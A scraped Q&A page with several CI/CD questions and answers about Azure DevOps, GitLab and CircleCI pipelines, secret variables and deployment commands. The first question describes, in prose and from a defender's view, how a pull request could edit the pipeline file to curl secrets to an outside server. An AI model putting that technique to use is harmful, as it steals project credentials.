We have an open source project in GitHub. And we use Azure DevOps pipelines for our CI.
We publish our artefacts to S3 and Maven after successful tests, so all the credentials are stored as secret variables.
It's nice that export and echo $top_secret are conveniently obfuscated with ***, but unfortunately literally any user on GitHub can create a pull request against our repo, and as part of the changes, they can edit our azure-pipelines.yml and call a curl (or similar) to read the credentials from environmental variables and send them to their own server.
In other CI providers (Travis CI) secret variables are not accessible from PR branches.
How can I prevent PRs from touching my CI configuration file and do anything with it?
How can I prevent PRs from touching my CI configuration file and do anything with it?
You CI configuration file is save in the GitHub open source and you want to restrict users from changing this file, right? Since we cannot set file permission in the GitHub. we cannot prevent PRs from touching your CI configuration file.
As a workaround, we could create classic editor pipeline in the Azure DevOps and set the CI Trigger, such as below. If users do not have permission to change the build definition, they cannot change your CI build definition.
Update1
Related
I want to create Azure DevOps pipelines, but instead of writing new yaml files, use prepared ones that are in a github repository.
I have connected GitHub to my Azure DevOps account, but I Can't see an option to use yaml files in that repository.
I only have an option to create a new pipeline yaml, and then set it in the repo folder structure.
If I try and set it on the location of the yaml file I want to use, which is already in the repo, I get - of course, an error stating there's a file there.
My work around is to set a new yaml file with a different name, copy the content from the existing file and then delete that one and rename the new file to the name of the file I copied from.
Surely there must be a better, easier, more logical and short way.
I would appreciate any help.
Under project settings you should link your Github account.
Then you can go and create a new pipeline and select the Github location
after this step, your available github repositories will appear and you can select your existing .YML file.
Existing pipeline:
I'm new to Azure DevOps, and I was wondering if there was a way to automatically detected a .yml build file and create a pipeline without having to interact with the site.
I have tried creating a file called azure-pipelines.yml in the root of the repo, with no luck.
Is there anyway to automatically create pipelines? Like how Jenkins detects a Jenkinsfile?
No this is nott possible out of the box, because YAML file is not always pipeline definition. You my try to figure out if it is trully is, however you need to listen for repo changes and in fact you can do this via another pipeline ;) for instance as this:
check if commit has a new yaml file added
verify if the file is pipeline
create a pipeline using azure cli (for instance)
However, this would be quite a lot of work and then you need to create such pipeline in every repo you want to have this detection enabled.
I have created a Pipeline in Azure DevOps and have associated a git repository.
It is cloned to my agent, but I can't get control over in which local directory the repository is cloned to. I am working with self hosted Agent.
The next task need to use a specific file in the repository to complete the task.
The last things tha should happen in the pipline, is push back changes made in the respository.
I think what you want is WorkingDirectory, the local path on the agent where your source code files are downloaded. For example: c:\agent_work\1\s
We have a Gitlab Project with multiple developers, and the repo itself is a conan Project.
When creating a release tag, I want to setup a pipeline which creates the conan package and then uploads it to artifactory. Uploading to the Artifactory requires a username and password login. This is similar to many other deployment jobs where a user+pass authentication is required.
I already found a solution to define secret variables for the project (project level) and use a single account for the whole project to upload to artifactory. This is security-wise an issue, as we want to know who uploaded the conan package, i.e., which user.
Is it somehow in Gitlab possible to define secrets on the user level?
I.e., if User1 creates the tag and has his own Artifactory Account User+Pass secrets set up, the pipeline successfuly pushes the conan package.
If now User2 creates a tag but did not setup secrets, the push should fail.
The following Gitlab issue is a similar description of the problem, but does not contain any solution:
https://gitlab.com/gitlab-org/gitlab/-/issues/15815
Also related: gitlab credentials for specific user (but handles a shared secret with specific user access).
CI secrets are currently only project level, but you might be able to do something similar with one of the predefined env variables. There are four variables that hold info about the Gitlab user who started the pipeline (either by trigger, schedule, push, etc). $GITLAB_USER_EMAIL, $GITLAB_USER_ID, $GITLAB_USER_LOGIN, $GITLAB_USER_NAME. Then, in your projects secret variables, you can store credentials for each of your users, and in your job grab the correct one based on the USER variables.
I'm using CircleCI for the first time and having trouble publishing to Azure.
The docs don't have an example for Azure, they have an example for AWS and a note for Azure saying "To deploy to Azure, use a similar job to the above example that uses an appropriate command."
If anybody has an example YAML file that would be great, if not a nudge in the right direction would be handy. So far I think I've worked out the following.
I need a config that will install the Azure CLI
I need to put my Azure deployment credentials in an environment variable and
I need to run a deploy command in the YAML file to zip up all the right files and deploy to my Azure app service.
I have no idea if the above is correct, or how to do it, but that's my understanding right now.
I've also posted this on the CircleCi forum.
EDIT: Just to add a little more info, the AWS version of the config file used the following command:
- run:
name: Deploy to S3
command: aws s3 sync jekyll/_site/docs s3://circle-production-static-site/docs/ --delete
So I guess I'm looking for the Azure equivalent.
The easiest way is that on the azure management console you setup as deployment from source control and you can follow this two links
https://medium.com/#strid/automatic-deploy-to-azure-web-app-with-circle-ci-v2-0-1e4bda0626e5
https://www.bradleyportnoy.com/how-to-set-up-continuous-deployment-to-azure-from-circle-ci/
if you want to do the copy of the files from ci to the iis server or azure you will need ssh access the keys etc.. and In the Dependencies section of circle.yml you can have a line such as this:
deployment:
production:
branch: master
commands:
- scp -r circle-pushing/* username#my-server:/path-to-put-files-on-server/
“circle-pushing” is your repo name, which is whatever it’s called in GitHub or Bitbucket, and the rest is the hostname and filepath of the server you want to upload files to.
and probably this could help you understand it better
https://learn.microsoft.com/en-us/azure/virtual-machines/linux/copy-files-to-linux-vm-using-scp